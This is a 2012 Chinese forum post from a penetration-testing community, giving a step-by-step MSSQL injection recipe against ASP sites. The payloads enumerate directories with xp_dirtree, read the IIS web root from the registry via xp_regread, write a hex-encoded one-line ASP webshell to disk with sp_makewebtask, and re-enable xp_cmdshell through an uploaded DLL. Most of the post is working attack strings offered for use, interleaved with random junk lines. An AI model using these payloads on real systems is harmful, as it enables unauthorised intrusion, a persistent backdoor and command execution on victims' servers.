中国网络渗透测试联盟
标题:
MSsqlL注入取得网站路径最好的方法
[打印本页]
作者:
admin
时间:
2012-9-13 17:20
标题:
MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'
3 {( c I" O4 g- T; r O
假设我们在test里有两个文件夹test1和test2在test1里又有test3
8 R \( E' T- D- K/ d2 Z
结果显示
2 T% P, I1 g: E, A5 e6 f8 A
! L" f/ ]- S! r1 g" ~( h3 K& ?+ q
subdirectory depth
) w0 {# r& X7 @1 A7 Z
test1 1
' W) H7 Y; [2 U9 d* g
test3 2
+ v2 @; e/ z! [( o4 Z3 P; A
test2 1
3 V' K1 ?, E3 X% }. w/ b+ y3 O4 w. B" v
) B: u) Y- i) H
哈哈发现没有那个depth就是目录的级数
: T# z0 \& z8 Z0 {) A; |5 ?
ok了,知道怎么办了吧
" x' q1 a2 n$ Y' A- p. |! N
6 I% u) |# O( Z! `: v8 u1 ]
http://www.xxxxx.com/down/list.asp?id=1;create
table dirs(paths varchar(1000),id int)--
$ c6 O% l+ ]2 b; \
http://www.xxxxx.com/down/list.asp?id=1;insert
dirs exec master.dbo.xp_dirtree 'd:\' --
0 v/ l: T, I+ I1 H( w* n
http://www.xxxxx.com/down/list.asp?id=1
and 0<>(select top 1 paths from dirs where id=1)-
$ @* o" a4 h# I) v
* D3 g- b& \- b
只要加上id=1,就是第一级目录 。
# r) a& m, ~& z9 f! W
% C. Q; x% C( n" Q
4 Y8 I) e4 t1 P5 G1 A5 _
通过注册表读网站路径:
* e( V$ m. e- p( D# P, ^
9 x: v6 J- e% V) `8 k
1.;create table [dbo].[cyfd] ([gyfd][char](255));
- O* U M i# y$ v
5 v, P, x, ~2 B! `0 j
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
$ m6 L \' i; H' i- _8 A) X
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
2 e4 U1 k4 O8 L4 d
+ m5 W8 J" P0 u; k
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
; ^! b! Z$ {* m: O8 L" z0 ~
and 1=(select count(*) from cyfd where gyfd > 1)
$ E* A6 `3 l. `; X/ w
这样IE报错,就把刚才插进去的Web路径的值报出来了
- X& v% W4 v6 s5 ?: L! y
: R& ?! _# c% F! A3 P E7 h: W
4.drop table cyfd;-- 删除临时表
5 d) T, [, I: W7 f% V9 f( _: I, \/ P
; o: I# U/ H, R( Y
获得webshell方法:
4 U5 U/ k( Z q
1.create table cmd (a image)-- \**cmd是创建的临时表
4 t! \+ ]' P; H' e6 F
. m7 Q c( L5 I* A
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
% `0 @8 }3 N4 v3 j+ X
" [; j# U( h+ l" `/ B
8 Q- s* t1 i B6 S6 i9 D
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
) o* I0 \# o/ s* ^% M
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
7 O: }& Y' ?8 a5 w; t
- O+ i9 h* y: b+ x }
4.drop table cmd;-- 删除cmd临时表
, n- T8 C0 c4 k
' V5 [* V( Y: V# @
恢复xp_cmdshell方法之一:
5 A; `1 A" L; V/ `9 E' V
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
- s* D2 m9 {# k! M' C
http://www.something.com/script.asp?id=2;EXEC
master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
0 F+ V0 K; b9 S7 ]" C% [" @
恢复,支持绝对路径的恢复哦。:)
1 f6 u) N% i3 y
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2